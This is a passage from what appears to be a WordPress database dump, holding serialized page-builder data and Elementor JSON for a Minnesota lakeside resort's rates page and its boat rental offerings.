RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:3:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1530,695,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1531,696,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1532,696,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1533,696,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:2:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}i:1;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:2:{s:18:\"background_display\";s:4:\"tile\";s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:2:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1534,697,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:197:\"Call us at 218-747-2959 for reservations \n\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1522555766946\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:16:\"\n	[table id=1 /]\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:5:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:843:\"\n	Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS. PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS. CRIBS &amp; HIGHCHAIRS AVAILABLE.\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION ALL DEPOSITS ARE NON-REFUNDABLE.\nCHECK IN TIME IS AFTER 3:00PM NO EXCEPTIONS CHECK OUT TIME IS BEFORE 10:00AM\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units PETS $5.00 per day\nPlease do not bring firewood, if you live more tha 50 miles from Ashby!\nMOTEL OPEN YEAR ROUND. CALL FOR WINTER RATES\";s:6:\"filter\";s:1:\"1\";s:4:\"type\";s:6:\"visual\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:7:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1546,61,'_elementor_edit_mode','builder'),(1547,61,'vantage_panels_no_legacy','true'),(1550,61,'_elementor_template_type','post'),(1553,701,'_wp_attached_file','2018/04/20Foot.png'),(1554,701,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:472;s:6:\"height\";i:352;s:4:\"file\";s:18:\"2018/04/20Foot.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"20Foot-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"20Foot-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:18:\"20Foot-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:18:\"20Foot-436x272.png\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:18:\"20Foot-272x182.png\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1555,61,'_elementor_data','[{\"id\":\"86ecb3f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8a45f64\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"142d45e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3d072d4\"}]},\"elements\":[{\"id\":\"7e4ba31\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"84ad9d6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8aaa860\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"619f46d\"}]},\"elements\":[{\"id\":\"3a53155\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2018\\/04\\/20Foot.png\",\"id\":701},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1ab4587\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">20 foot pontoon With 25 HP Yamaha 4 stroke Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"706d39a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48d8414\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c530bfd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6edda1c\"}]},\"elements\":[{\"id\":\"9bcae90\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/02\\/DSCN2723.jpg\",\"id\":549},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"84b34fe\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">14 foot Lund Fishing Boat with 15 HP Yamaha Rental<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34966cb\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"80347fe\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"02046c5\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1893353\"}]},\"elements\":[{\"id\":\"403ea9b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b555a73\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ecce2ec\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"097b1aa\"}]},\"elements\":[{\"id\":\"d260d09\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3711.jpg\",\"id\":494}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ae3529b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">FREE USE OF THE PADDLE BOAT<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"eefc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9de916f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"f334c4c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"75e0743\"}]},\"elements\":[{\"id\":\"991c5f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3841.jpg\",\"id\":497}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"340682a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">BOAT LAUNCH ON SITE $10.00 ONE TIME 